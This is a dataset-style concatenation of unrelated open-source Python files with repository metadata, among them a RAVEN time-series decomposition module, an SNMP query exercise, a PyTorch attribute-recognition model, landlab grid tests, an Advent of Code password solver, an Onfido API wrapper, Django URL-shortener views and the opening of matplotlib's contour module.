2021-07-12T19:41:52.000Z
|
2021-07-12T19:41:52.000Z
|
framework/TSA/RWD.py
|
yenili/raven
|
cc5f10e387d40219213beff05a3f72e9386034d5
|
[
"Apache-2.0"
] | null | null | null |
framework/TSA/RWD.py
|
yenili/raven
|
cc5f10e387d40219213beff05a3f72e9386034d5
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2017 Battelle Energy Alliance, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Randomized Window Decomposition
"""
import collections
import numpy as np
import scipy as sp
import Decorators
import string
import numpy.linalg as LA
import pandas as pd
import copy as cp
from utils import InputData, InputTypes, randomUtils, xmlUtils, mathUtils, importerUtils
statsmodels = importerUtils.importModuleLazy('statsmodels', globals())
import Distributions
from .TimeSeriesAnalyzer import TimeSeriesGenerator, TimeSeriesCharacterizer
randomUtils.randomSeed(42, engine=None, seedBoth=False)
# utility methods
class RWD(TimeSeriesCharacterizer):
r"""
Randomized Window Decomposition
"""
@classmethod
def getInputSpecification(cls):
"""
Method to get a reference to a class that specifies the input data for
class cls.
@ Out, inputSpecification, InputData.ParameterInput, class to use for
specifying input of cls.
"""
specs = super(RWD, cls).getInputSpecification()
specs.name = 'rwd'
specs.description = r"""TimeSeriesAnalysis algorithm for sliding window snapshots to generate features"""
specs.addSub(InputData.parameterInputFactory('signatureWindowLength', contentType=InputTypes.IntegerType,
descr=r"""the size of signature window, which represents as a snapshot for a certain time step;
typically represented as $w$ in literature, or $w_sig$ in the code."""))
specs.addSub(InputData.parameterInputFactory('featureIndex', contentType=InputTypes.IntegerType,
descr=r""" Index used for feature selection, which requires pre-analysis for now, will be addresses
via other non human work required method """))
specs.addSub(InputData.parameterInputFactory('sampleType', contentType=InputTypes.IntegerType,
descr=r"""Indicating the type of sampling."""))
return specs
#
# API Methods
#
def __init__(self, *args, **kwargs):
"""
      A constructor that will appropriately initialize a supervised learning object
@ In, args, list, an arbitrary list of positional values
@ In, kwargs, dict, an arbitrary dictionary of keywords and values
@ Out, None
"""
# general infrastructure
super().__init__(*args, **kwargs)
self._minBins = 20 # this feels arbitrary; used for empirical distr. of data
def handleInput(self, spec):
"""
Reads user inputs into this object.
      @ In, spec, InputData.ParameterInput, input specifications
      @ In, sampleType, integer = 0, 1, 2
        @ sampleType = 0: sequential sampling
        @ sampleType = 1: random sampling
        @ sampleType = 2: piecewise sampling
@ Out, settings, dict, initialization settings for this algorithm
"""
settings = super().handleInput(spec)
settings['signatureWindowLength'] = spec.findFirst('signatureWindowLength').value
settings['featureIndex'] = spec.findFirst('featureIndex').value
settings['sampleType'] = spec.findFirst('sampleType').value
return settings
def setDefaults(self, settings):
"""
Fills default values for settings with default values.
@ In, settings, dict, existing settings
@ Out, settings, dict, modified settings
"""
settings = super().setDefaults(settings)
if 'signatureWindowLength' not in settings:
settings['signatureWindowLength'] = None
settings['sampleType'] = 1
    return settings
def characterize(self, signal, pivot, targets, settings):
"""
      Determines the characteristics of the signal based on this algorithm.
@ In, signal, np.ndarray, time series with dims [time, target]
@ In, pivot, np.1darray, time-like parameter values
@ In, targets, list(str), names of targets in same order as signal
@ In, settings, dict, settings for this ROM
@ Out, params, dict of dict: 1st level contains targets/variables; 2nd contains: U vectors and features
"""
# lazy import statsmodels
import statsmodels.api
# settings:
# signatureWindowLength, int, Signature window length
# featureIndex, list of int, The index that contains differentiable params
params = {}
for tg, target in enumerate(targets):
history = signal[:, tg]
if settings['signatureWindowLength'] is None:
settings['signatureWindowLength'] = len(history)//10
signatureWindowLength = int(settings['signatureWindowLength'])
fi = int(settings['featureIndex'])
sampleType = settings['sampleType']
allWindowNumber = int(len(history)-signatureWindowLength+1)
signatureMatrix = np.zeros((signatureWindowLength, allWindowNumber))
for i in range(allWindowNumber):
signatureMatrix[:,i] = np.copy(history[i:i+signatureWindowLength])
# Sequential sampling
if sampleType == 0:
baseMatrix = np.copy(signatureMatrix)
# Randomized sampling
elif sampleType == 1:
sampleLimit = len(history)-signatureWindowLength
windowNumber = sampleLimit//4
baseMatrix = np.zeros((signatureWindowLength, windowNumber))
for i in range(windowNumber):
          windowIndex = randomUtils.randomIntegers(0, sampleLimit, caller=None, engine=None)
baseMatrix[:,i] = np.copy(history[windowIndex:windowIndex+signatureWindowLength])
# Piecewise Sampling
else:
windowNumber = len(history)//signatureWindowLength
baseMatrix = np.zeros((signatureWindowLength, windowNumber))
for i in range(windowNumber-1):
baseMatrix[:,i] = np.copy(history[i*signatureWindowLength:(i+1)*signatureWindowLength])
U,s,V = mathUtils.computeTruncatedSingularValueDecomposition(baseMatrix,0)
featureMatrix = U.T @ signatureMatrix
params[target] = {'uVec' : U[:,0:fi],
'Feature': featureMatrix}
return params
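    # A minimal standalone sketch of the decomposition above, assuming a 1-D numpy
    # array history and a window length w (illustration only, mirrors the
    # sequential-sampling case where the base matrix equals the signature matrix;
    # not part of the RAVEN API):
    #
    #     S = np.column_stack([history[i:i+w] for i in range(len(history) - w + 1)])
    #     U, s, V = np.linalg.svd(S, full_matrices=False)  # SVD of the base matrix
    #     features = U.T @ S                               # projected features ('Feature')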
def getParamNames(self, settings):
"""
Return list of expected variable names based on the parameters
@ In, settings, dict, training parameters for this algorithm
@ Out, names, list, string list of names
"""
names = []
for target in settings['target']:
base = f'{self.name}__{target}'
sw = int(settings['signatureWindowLength'])
fi = int(settings['featureIndex'])
for i in range(fi):
for j in range(sw):
names.append(f'{base}__uVec{i}_{j}')
return names
def getParamsAsVars(self, params):
"""
Map characterization parameters into flattened variable format
@ In, params, dict, trained parameters (as from characterize)
@ Out, rlz, dict, realization-style response
"""
rlz = {}
for target, info in params.items():
base = f'{self.name}__{target}'
(k,l) = (info['uVec']).shape
for i in range(l):
for j in range(k):
rlz[f'{base}__uVec{i}_{j}'] = info['uVec'][j,i]
return rlz
def generate(self, params, pivot, settings):
"""
Generates a synthetic history from fitted parameters.
      @ In, params, dict, characterization such as obtained from self.characterize()
@ In, pivot, np.array(float), pivot parameter values
@ In, settings, dict, additional settings specific to algorithm
@ Out, synthetic, np.array(float), synthetic estimated model signal
"""
synthetic = np.zeros((len(pivot), len(params)))
for t, (target, _) in enumerate(params.items()):
sigMatSynthetic = params[target]['uVec'] @ params[target]['Feature']
synthetic[:, t] = np.hstack((sigMatSynthetic[0,:-1], sigMatSynthetic[:,-1]))
return synthetic
def writeXML(self, writeTo, params):
"""
Allows the engine to put whatever it wants into an XML to print to file.
@ In, writeTo, xmlUtils.StaticXmlElement, entity to write to
@ In, params, dict, params from as from self.characterize
@ Out, None
"""
counter = 0
for target, info in params.items():
base = xmlUtils.newNode(target)
writeTo.append(base)
(m,n) = info["uVec"].shape
for i in range(n):
U0 = info["uVec"][:,0]
counter +=1
for p, ar in enumerate(U0):
base.append(xmlUtils.newNode(f'uVec{i}_{p}', text=f'{float(ar):1.9e}'))
| 38.178261 | 116 | 0.676916 |
ca29a6e5822ff0c2f2f52dcfb365403314caeb60
| 46 |
py
|
Python
|
end2you/models/multimodal/fusion.py
|
mauricege/end2you
|
0d0c731e210410a1a5b561a747dbea5b0b53639d
|
[
"BSD-3-Clause"
] | null | null | null |
end2you/models/multimodal/fusion.py
|
mauricege/end2you
|
0d0c731e210410a1a5b561a747dbea5b0b53639d
|
[
"BSD-3-Clause"
] | null | null | null |
end2you/models/multimodal/fusion.py
|
mauricege/end2you
|
0d0c731e210410a1a5b561a747dbea5b0b53639d
|
[
"BSD-3-Clause"
] | null | null | null |
# Fusion methods provided to fuse modalities.
| 23 | 45 | 0.804348 |
4bd7df19d8266c5bdd9a94c1f1e6994b17d75f6d
| 756 |
py
|
Python
|
class3/class3_ex1.py
|
ande0581/pynet
|
c02572236383231cb5a1a7b2892ab5e7c94238c7
|
[
"Apache-2.0"
] | null | null | null |
class3/class3_ex1.py
|
ande0581/pynet
|
c02572236383231cb5a1a7b2892ab5e7c94238c7
|
[
"Apache-2.0"
] | null | null | null |
class3/class3_ex1.py
|
ande0581/pynet
|
c02572236383231cb5a1a7b2892ab5e7c94238c7
|
[
"Apache-2.0"
] | null | null | null |
# SNMPwalk on Windows
# SnmpWalk.exe -r:10.40.0.1 -t:10 -c:"private" -os:1.3.6.1.2.1.2.2.1 -op:1.3.6.1.2.1.2.2.1.20
import snmp_helper
ip = '10.40.0.1'
a_user = 'mysnmpuser'
auth_key = 'myauthkey'
encrypt_key = 'myencryptkey'
snmp_user = (a_user, auth_key, encrypt_key)
my_router = (ip, 161)
systemName = '1.3.6.1.2.1.1.5.0'
ccmHistoryRunningLastChanged = '1.3.6.1.4.1.9.9.43.1.1.1.0'
ccmHistoryRunningLastSaved = '1.3.6.1.4.1.9.9.43.1.1.2.0'
ccmHistoryStartupLastChanged = '1.3.6.1.4.1.9.9.43.1.1.3.0'
sysUptime = '1.3.6.1.2.1.1.3.0'
oid = ccmHistoryStartupLastChanged
snmp_data = snmp_helper.snmp_get_oid_v3(my_router, snmp_user, oid=oid)
output = snmp_helper.snmp_extract(snmp_data)
print output
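# A rough sketch (same helper and credentials) for querying several of the OIDs
# defined above in one pass:
#
#     for label, oid in [('uptime', sysUptime),
#                        ('running-last-changed', ccmHistoryRunningLastChanged),
#                        ('running-last-saved', ccmHistoryRunningLastSaved)]:
#         data = snmp_helper.snmp_get_oid_v3(my_router, snmp_user, oid=oid)
#         print label, snmp_helper.snmp_extract(data)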
if __name__ == '__main__':
print "hello world"
| 28 | 93 | 0.703704 |
076cdf162d8ce46f2d17a43b464cfb52165b96b8
| 3,643 |
py
|
Python
|
pardet/models/par_detectors/strongbaseline.py
|
wduo/pardet-pytorch
|
9df9124b013728d9de4d7948d1e5a6f535c9d7e7
|
[
"Apache-2.0"
] | 7 |
2020-12-06T11:14:58.000Z
|
2021-03-28T08:48:07.000Z
|
pardet/models/par_detectors/strongbaseline.py
|
wduo/pardet-pytorch
|
9df9124b013728d9de4d7948d1e5a6f535c9d7e7
|
[
"Apache-2.0"
] | null | null | null |
pardet/models/par_detectors/strongbaseline.py
|
wduo/pardet-pytorch
|
9df9124b013728d9de4d7948d1e5a6f535c9d7e7
|
[
"Apache-2.0"
] | 3 |
2020-12-06T14:24:24.000Z
|
2021-11-25T09:57:53.000Z
|
from collections import OrderedDict
import torch
import torch.nn as nn
from ..builder import CLASSIFIERS, PARNETS, build_bockbone, build_classifier, build_loss
@CLASSIFIERS.register_module()
class BaseClassifier(nn.Module):
def __init__(self, nattr):
super().__init__()
self.logits = nn.Sequential(
nn.Linear(2048, nattr),
nn.BatchNorm1d(nattr)
)
self.avg_pool = nn.AdaptiveAvgPool2d(1)
def fresh_params(self):
return self.parameters()
def forward(self, feature):
feat = self.avg_pool(feature).view(feature.size(0), -1)
x = self.logits(feat)
return x
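        # A minimal usage sketch of this head (shapes and attribute count are assumed,
        # not taken from the original repo):
        #
        #     head = BaseClassifier(nattr=26)        # e.g. 26 pedestrian attributes
        #     feat = torch.randn(8, 2048, 7, 7)      # backbone feature map, batch of 8
        #     logits = head(feat)                    # -> shape (8, 26)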
@PARNETS.register_module()
class StrongBaseline(nn.Module):
def __init__(self, backbone, classifier, loss):
super(StrongBaseline, self).__init__()
self.backbone = build_bockbone(backbone)
self.classifier = build_classifier(classifier)
self.loss = build_loss(loss)
def fresh_params(self):
params = self.classifier.fresh_params()
return params
def finetune_params(self):
return self.backbone.parameters()
def extract_feat(self, img):
x = self.backbone(img)
return x
def forward_train(self, **kwargs):
feat_map = self.extract_feat(kwargs['img'].cuda())
logits = self.classifier(feat_map)
losses = dict()
loss = self.loss(logits, kwargs['gt_label'].cuda(), kwargs['weights'])
losses.update(loss)
return losses
def forward(self, return_loss=True, **kwargs):
if return_loss:
return self.forward_train(**kwargs)
else:
return self.forward_test(**kwargs)
def train_step(self, data, optimizer, **kwargs):
losses = self(**data, **kwargs)
loss, log_vars = self._parse_losses(losses)
outputs = dict(
loss=loss, log_vars=log_vars, num_samples=len(data['img_name']))
return outputs
def val_step(self, data, optimizer, **kwargs):
losses = self(**data, **kwargs)
loss, log_vars = self._parse_losses(losses)
outputs = dict(
loss=loss, log_vars=log_vars, num_samples=len(data['img_name']))
return outputs
def _parse_losses(self, losses):
log_vars = OrderedDict()
for loss_name, loss_value in losses.items():
if isinstance(loss_value, torch.Tensor):
log_vars[loss_name] = loss_value.mean()
elif isinstance(loss_value, list):
log_vars[loss_name] = sum(_loss.mean() for _loss in loss_value)
else:
raise TypeError(f'{loss_name} is not a tensor or list of tensors')
loss = sum(_value for _key, _value in log_vars.items() if 'loss' in _key)
log_vars['loss'] = loss
for loss_name, loss_value in log_vars.items():
log_vars[loss_name] = loss_value.item()
return loss, log_vars
def forward_test(self, **kwargs):
imgs = kwargs.pop('img')
num_augs = len(imgs)
if num_augs == 1:
return self.simple_test(imgs, **kwargs)
else:
return self.aug_test(imgs, **kwargs)
def simple_test(self, img, **kwargs):
feat_map = self.extract_feat(img.cuda())
logit = self.classifier(feat_map)
prob = torch.sigmoid(logit).detach().cpu().numpy()
gt_label = kwargs['gt_label'].detach().cpu().numpy()
result = dict(prob=prob, gt_label=gt_label)
return result
def aug_test(self, imgs, **kwargs):
# TODO: support test augmentation for predefined proposals
pass
| 31.136752 | 88 | 0.620093 |
8dc8ff1eaefdaf985e54b1927b1af3abe23572e7
| 2,168 |
py
|
Python
|
landlab/grid/tests/test_raster_grid/test_fields.py
|
laijingtao/landlab
|
871151bff814e672b4f09f091b6347367758c764
|
[
"MIT"
] | 1 |
2015-08-17T19:29:50.000Z
|
2015-08-17T19:29:50.000Z
|
landlab/grid/tests/test_raster_grid/test_fields.py
|
laijingtao/landlab
|
871151bff814e672b4f09f091b6347367758c764
|
[
"MIT"
] | null | null | null |
landlab/grid/tests/test_raster_grid/test_fields.py
|
laijingtao/landlab
|
871151bff814e672b4f09f091b6347367758c764
|
[
"MIT"
] | 2 |
2017-07-03T20:21:13.000Z
|
2018-09-06T23:58:19.000Z
|
import numpy as np
from numpy.testing import assert_array_equal
from nose.tools import assert_raises
from landlab import RasterModelGrid
def test_add_field_at_node():
"""Add field at nodes."""
grid = RasterModelGrid((4, 5))
grid.add_field('z', np.arange(20), at='node')
assert_array_equal(grid.at_node['z'], np.arange(20))
def test_add_field_without_at_keyword():
"""Test default is at nodes."""
grid = RasterModelGrid((4, 5))
grid.add_field('z', np.arange(20))
assert_array_equal(grid.at_node['z'], np.arange(20))
def test_add_field_without_at():
"""Test raises error with wrong size array."""
grid = RasterModelGrid((4, 5))
assert_raises(ValueError, grid.add_field, 'z', np.arange(21))
def test_add_field_at_grid_value_error():
"""Test raises error with wrong size array for adding a at_grid field both possible ways."""
grid = RasterModelGrid((4, 5))
assert_raises(ValueError, grid.add_field, 'value', [0,1], at='grid')
with assert_raises(ValueError):
grid.at_grid['new_value']=[2,4]
def test_add_field_at_grid():
"""Test add field at grid."""
grid = RasterModelGrid((4, 5))
grid.at_grid['value']=1
assert_array_equal(1, grid.at_grid['value'].size)
def test_adding_field_at_grid_two_ways():
"""Test add field at grid two ways."""
grid = RasterModelGrid((4, 5))
grid.at_grid['value_1']=1
grid.add_field('value_2', 1, at='grid')
assert_array_equal(grid.at_grid['value_1'], grid.at_grid['value_2'])
def test_add_ones_zeros_empty_to_at_grid():
"""Test different add methods for keyword at='grid'"""
grid = RasterModelGrid((4, 5))
assert_raises(ValueError, grid.add_zeros, 'value', at='grid')
assert_raises(ValueError, grid.add_empty, 'value', at='grid')
assert_raises(ValueError, grid.add_ones, 'value', at='grid')
def test_ones_zeros_empty_to_at_grid():
"""Test get array with field size methods for keyword at='grid'"""
grid = RasterModelGrid((4, 5))
assert_raises(ValueError, grid.zeros, at='grid')
assert_raises(ValueError, grid.empty, at='grid')
assert_raises(ValueError, grid.ones, at='grid')
| 34.967742 | 96 | 0.694649 |
f6624017b71f6f71b3d4fd4f1d2649cdd1378df3
| 1,488 |
py
|
Python
|
Day 11/part1.py
|
MrHarcombe/advent2015
|
b14b858eef369ed2df230a7c5ebc702eed7ef524
|
[
"CC0-1.0"
] | null | null | null |
Day 11/part1.py
|
MrHarcombe/advent2015
|
b14b858eef369ed2df230a7c5ebc702eed7ef524
|
[
"CC0-1.0"
] | null | null | null |
Day 11/part1.py
|
MrHarcombe/advent2015
|
b14b858eef369ed2df230a7c5ebc702eed7ef524
|
[
"CC0-1.0"
] | null | null | null |
import re
password = "abcdefgh"
password = "ghijklmn"
password = "vzbxkghb" # part 1 input
password = "vzbxxyzz" # part 2 input
#sequence = re.compile(r'(?:a(?=b)|b(?=c)|c(?=d)|d(?=e)|e(?=f)|f(?=g)|g(?=h)|h(?=i)|i(?=j)|j(?=k)|k(?=l)|l(?=m)|m(?=n)|n(?=o)|o(?=p)|p(?=q)|q(?=r)|r(?=s)|s(?=t)|t(?=u)|u(?=v)|v(?=w)|w(?=x)|x(?=y)|y(?=z)){3,}')
pairs = re.compile(r'([a-z])\1.*([a-z])\2')
def is_legal(potential):
if True in [c in potential for c in 'iol']:
#print(potential,"contains iol")
return False
#smatches = sequence.search(potential)
#if smatches == None:
#print(potential,"contains no sequence")
#return False
sequence = False
for p in range(len(potential)-2):
if ord(potential[p]) == ord(potential[p+1]) - 1 and ord(potential[p]) == ord(potential[p+2]) - 2:
sequence = True
if not sequence:
#print(potential,"contains no sequence")
return False
pmatches = pairs.search(potential)
if pmatches == None:
#print(potential,"contains no pairs")
return False
return True
def inc_password(value):
value = value[::-1]
keep_going = True
column = 0
while keep_going:
value = value[0:column] + chr(((ord(value[column]) - 97 + 1) % 26) + 97) + value[column+1:]
if value[column] != 'a':
keep_going = False
else:
column += 1
return value[::-1]
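# A few worked examples of the base-26 style increment above (values derived by hand
# from the code, not from the original author):
#
#     inc_password("xx")  -> "xy"
#     inc_password("xz")  -> "ya"     # 'z' wraps to 'a' and carries left
#     inc_password("azz") -> "baa"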
password = inc_password(password)
while not is_legal(password):
#print(password,"-> illegal")
password = inc_password(password)
print(password)
| 27.054545 | 209 | 0.603495 |
df27071f0bf39237294199481c51c72aa646ad28
| 782 |
py
|
Python
|
onfido/resources/applicants.py
|
daaain/onfido-python
|
62675c97cf7d03de2ab3ed4b07ec0bde9e2b1a5d
|
[
"MIT"
] | null | null | null |
onfido/resources/applicants.py
|
daaain/onfido-python
|
62675c97cf7d03de2ab3ed4b07ec0bde9e2b1a5d
|
[
"MIT"
] | null | null | null |
onfido/resources/applicants.py
|
daaain/onfido-python
|
62675c97cf7d03de2ab3ed4b07ec0bde9e2b1a5d
|
[
"MIT"
] | null | null | null |
from ..resource import Resource
class Applicants(Resource):
def create(self, request_body:dict):
return self.post("applicants/", **request_body)
def update(self, applicant_id:str, request_body:dict):
return self.put(f"applicants/{applicant_id}", request_body)
def find(self, applicant_id:str):
return self.get(f"applicants/{applicant_id}")
def delete(self, applicant_id:str):
self.delete_request(f"applicants/{applicant_id}")
def all(self, **user_payload:dict):
payload = {"include_deleted": False, "per_page": 20, "page": 1}
payload.update(user_payload)
return self.get("applicants", payload=payload)
def restore(self, applicant_id:str):
self.post(f"applicants/{applicant_id}/restore")
| 32.583333 | 71 | 0.682864 |
9e76fec151908142195eb38f84582544eeddb7bd
| 3,806 |
py
|
Python
|
test/perc.py
|
kariminf/MultiNetSum
|
b3a66d13049d4501c7e07243af45e8c56512d624
|
[
"Apache-2.0"
] | 1 |
2019-02-24T22:15:44.000Z
|
2019-02-24T22:15:44.000Z
|
test/perc.py
|
kariminf/MultiNetSum
|
b3a66d13049d4501c7e07243af45e8c56512d624
|
[
"Apache-2.0"
] | 6 |
2018-07-24T13:52:45.000Z
|
2019-08-23T22:10:16.000Z
|
test/perc.py
|
kariminf/MultiNetSum
|
b3a66d13049d4501c7e07243af45e8c56512d624
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2018 Abdelkrime Aries <[email protected]>
#
# ---- AUTHORS ----
# 2018 Abdelkrime Aries <[email protected]>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Just a small script to learn how to sum a vector, divide it by the sum of another
# vector, and then multiply by a scalar.
import tensorflow as tf
import numpy as np
DATA = [
[[15, 20], [15, 20, 30], 0.5],
[[10, 12], [15, 12, 12, 10], .3],
[[10, 12], [15, 12, 12, 10], .2],
[[2, 12, 13], [20, 13, 2, 12, 25], .1],
[[5], [5, 13, 12, 25], .7]
]
X = [
[[15.0], [20.0], [0.0]],
[[10.0], [12.0], [0.0]],
[[10.0], [12.0], [0.0]],
[[2.0], [12.0], [13.0]],
[[5.0], [0.0], [0.0]]
]
X__ = [
[[0.0], [15.0], [20.0]],
[[0.0], [10.0], [12.0]],
[[0.0], [10.0], [12.0]],
[[2.0], [12.0], [13.0]],
[[0.0], [0.0], [5.0]]
]
Y = [
[[15.0], [20.0], [30.0], [0.0], [0.0]],
[[15.0], [12.0], [12.0], [10.0], [0.0]],
[[15.0], [12.0], [12.0], [10.0], [0.0]],
[[20.0], [13.0], [2.0], [12.0], [25.0]],
[[5.0], [13.0], [12.0], [25.0], [0.0]]
]
Y__ = [
[[0.0], [0.0], [15.0], [20.0], [30.0]],
[[0.0], [15.0], [12.0], [12.0], [10.0]],
[[0.0], [15.0], [12.0], [12.0], [10.0]],
[[20.0], [13.0], [2.0], [12.0], [25.0]],
[[0.0], [5.0], [13.0], [12.0], [25.0]]
]
Z = [
[0.5],
[0.3],
[0.2],
[0.1],
[0.7]
]
RESULT = [
[0.2692307692],
[0.1346938776],
[0.0897959184],
[0.0375],
[0.0636363636]
]
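# Worked check of the target rule (sum of X row / sum of Y row * Z) against the
# first two rows above:
#   sum([15, 20]) / sum([15, 20, 30]) * 0.5 = 35 / 65 * 0.5 ≈ 0.2692307692
#   sum([10, 12]) / sum([15, 12, 12, 10]) * 0.3 = 22 / 49 * 0.3 ≈ 0.1346938776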
LEARNING_RATE = 0.05
def get_output(net):
batch_size = tf.shape(net)[0]
max_length = tf.shape(net)[1]
out_size = int(net.get_shape()[2])
index = tf.range(0, batch_size) * max_length
flat = tf.reshape(net, [-1, out_size])
return tf.gather(flat, index)
if __name__ == '__main__':
##############################################################################
x_ = tf.placeholder(tf.float32, shape=[None,None,1], name="x-input")
y_ = tf.placeholder(tf.float32, shape=[None,None,1], name="y-input")
z_ = tf.placeholder(tf.float32, shape=[None,1], name="z-input")
r_ = tf.placeholder(tf.float32, shape=[None ,1], name="result")
with tf.variable_scope("lstm1"):
sumXCell = tf.contrib.rnn.LSTMCell(2,num_proj=2)
outX,_ = tf.nn.dynamic_rnn(sumXCell,x_,dtype=tf.float32) #shape: (None, 12, 2)
with tf.variable_scope("lstm2"):
sumYCell = tf.contrib.rnn.LSTMCell(2, num_proj=2)
outY,_ = tf.nn.dynamic_rnn(sumYCell,y_,dtype=tf.float32) #shape: (None, 12, 2)
predXS = tf.reduce_sum(outX)
outXY = tf.concat((get_output(outX), get_output(outY), z_), axis=1)
output = tf.layers.dense(outXY, units=10, activation=tf.nn.tanh)
output = tf.layers.dense(output, units=1, activation=tf.nn.tanh)
cost = tf.losses.mean_squared_error(r_, output)
train_step = tf.train.GradientDescentOptimizer(LEARNING_RATE).minimize(cost)
init = tf.global_variables_initializer()
sess = tf.Session()
sess.run(init)
#saver = tf.train.Saver()
for i in range(10000):
_, cst, px = sess.run([train_step, cost, predXS], feed_dict={x_: X, y_: Y, z_: Z , r_: RESULT})
print i, cst, px
#sess.run(train_step, feed_dict={x_: X, y_: Y, z_: Z, r_: RESULT})
#saver.save(sess, "./aak.ckpt")
tX = [[[10.0], [5.0]]]
tY = [[[10.0], [5.0], [15.0], [8.0]]]
tZ = [[0.8]]
tRES = [[0.3157894737]]
print("Predicted: ", sess.run(output,feed_dict={x_: tX, y_: tY, z_: tZ}), " Expected: ", tRES)
| 26.802817 | 97 | 0.582764 |
6f9559d27dc3428c0f2e5d230a21306727376bca
| 745 |
py
|
Python
|
ai_chan/util.py
|
kagyuu/ai-chan
|
1fa5c803ca9fefb1ccf6c9195c8f8015da56bda1
|
[
"MIT"
] | null | null | null |
ai_chan/util.py
|
kagyuu/ai-chan
|
1fa5c803ca9fefb1ccf6c9195c8f8015da56bda1
|
[
"MIT"
] | null | null | null |
ai_chan/util.py
|
kagyuu/ai-chan
|
1fa5c803ca9fefb1ccf6c9195c8f8015da56bda1
|
[
"MIT"
] | null | null | null |
import numpy as np
import matplotlib.pyplot as plt
def debug(msg, *args):
print(msg.format(*args))
def least_square_average(d, y):
"""
    Compute the mean of the squared error (summed squared error halved, then averaged over samples).
    :param d: teacher data (expected)
    :param y: prediction (actual)
    :return: mean squared error
"""
return (np.sum(np.square(d - y)) / 2.0) / float(len(d))
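    # A quick worked example (numpy array inputs assumed):
    #
    #     d = np.array([1.0, 2.0]); y = np.array([1.0, 4.0])
    #     least_square_average(d, y)   # ((0 + 4) / 2) / 2 = 1.0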
def draw_hist(m, label, bins=50, min_max=(-10.0, 10.0)):
"""
    Flatten a list of matrices and build a matplotlib histogram from the values.
    :param m: list of matrices
    :param label: name of the data
    :param bins: number of bins (default 50); pass None for automatic binning
    :param min_max: data range (default -10.0 to 10.0); pass None for an automatic range
:return:
"""
flat = []
for idx in range(1, len(m)):
flat.extend(m[idx].flatten().tolist())
plt.hist(flat, label=label, bins=bins, range=min_max, alpha=0.5)
| 23.28125 | 68 | 0.620134 |
3f56f1de768b233583ce4c485e721211d46ae025
| 1,412 |
py
|
Python
|
url_shortener/views.py
|
teremterem/django_url_shortener
|
2da496a9e8287e6291d47227b72e92ee05d4f0b1
|
[
"MIT"
] | 2 |
2020-09-01T19:05:23.000Z
|
2020-09-02T13:14:32.000Z
|
url_shortener/views.py
|
teremterem/django_url_shortener
|
2da496a9e8287e6291d47227b72e92ee05d4f0b1
|
[
"MIT"
] | 15 |
2020-09-02T00:30:38.000Z
|
2020-09-19T10:06:19.000Z
|
url_shortener/views.py
|
teremterem/django_url_shortener
|
2da496a9e8287e6291d47227b72e92ee05d4f0b1
|
[
"MIT"
] | null | null | null |
import logging
from django.conf import settings
from django.http import HttpResponseRedirect, Http404
from django.shortcuts import render, redirect
from url_shortener.shortener import shortener_storage, shortener_utils
log = logging.getLogger(__name__)
def index(request):
last_short_url = request.session.pop('LAST_URL_HANDLE', '')
if last_short_url:
last_short_url = settings.DJANGO_URL_SHORTENER_PREFIX + last_short_url
return render(request, 'url_shortener/index.html', context={
'last_short_url': last_short_url,
})
def shorten_url(request):
long_url = request.POST['long_url'].strip()
if long_url:
long_url = shortener_utils.normalize_long_url(long_url)
url_handle = shortener_storage.shorten_url(long_url)
request.session['LAST_URL_HANDLE'] = url_handle
return redirect('index', permanent=False)
def expand_url(request, url_handle):
try:
long_url = shortener_storage.expand_url(url_handle)
if long_url:
return HttpResponseRedirect(long_url)
except Exception:
        # Log the exception at debug level to avoid cluttering the logs in a hypothetical production setup; it is
        # easy to provoke exceptions here by deliberately sending malformed url handles from the client.
log.debug('Failed to resolve short URL with handle %s', url_handle, exc_info=True)
raise Http404('URL not found')
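# A minimal URLconf sketch for wiring these views up (route names inferred from the
# redirect('index') call above; the project's actual urls.py may differ):
#
#     from django.urls import path
#     from url_shortener import views
#
#     urlpatterns = [
#         path('', views.index, name='index'),
#         path('shorten/', views.shorten_url, name='shorten_url'),
#         path('<str:url_handle>', views.expand_url, name='expand_url'),
#     ]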
| 32.837209 | 115 | 0.73796 |
0ab6f6687f2ca137dfb5899725d27acccb505b3e
| 42,063 |
py
|
Python
|
lib/matplotlib/contour.py
|
mattfoster/matplotlib
|
0b47697b19b77226c633ec6a3d74a2199a153315
|
[
"PSF-2.0",
"BSD-3-Clause"
] | 1 |
2016-05-08T18:33:12.000Z
|
2016-05-08T18:33:12.000Z
|
lib/matplotlib/contour.py
|
mattfoster/matplotlib
|
0b47697b19b77226c633ec6a3d74a2199a153315
|
[
"PSF-2.0",
"BSD-3-Clause"
] | null | null | null |
lib/matplotlib/contour.py
|
mattfoster/matplotlib
|
0b47697b19b77226c633ec6a3d74a2199a153315
|
[
"PSF-2.0",
"BSD-3-Clause"
] | null | null | null |
"""
These are classes to support contour plotting and
labelling for the axes class
"""
from __future__ import division
import warnings
import matplotlib as mpl
import numpy as np
from numpy import ma
import matplotlib._cntr as _cntr
import matplotlib.path as path
import matplotlib.ticker as ticker
import matplotlib.cm as cm
import matplotlib.colors as colors
import matplotlib.collections as collections
import matplotlib.font_manager as font_manager
import matplotlib.text as text
import matplotlib.cbook as cbook
import matplotlib.mlab as mlab
# Import needed for adding manual selection capability to clabel
from matplotlib.blocking_input import BlockingContourLabeler
# We can't use a single line collection for contour because a line
# collection can have only a single line style, and we want to be able to have
# dashed negative contours, for example, and solid positive contours.
# We could use a single polygon collection for filled contours, but it
# seems better to keep line and filled contours similar, with one collection
# per level.
class ContourLabeler:
'''Mixin to provide labelling capability to ContourSet'''
def clabel(self, *args, **kwargs):
"""
call signature::
clabel(cs, **kwargs)
adds labels to line contours in *cs*, where *cs* is a
:class:`~matplotlib.contour.ContourSet` object returned by
contour.
::
clabel(cs, v, **kwargs)
only labels contours listed in *v*.
Optional keyword arguments:
*fontsize*:
See http://matplotlib.sf.net/fonts.html
*colors*:
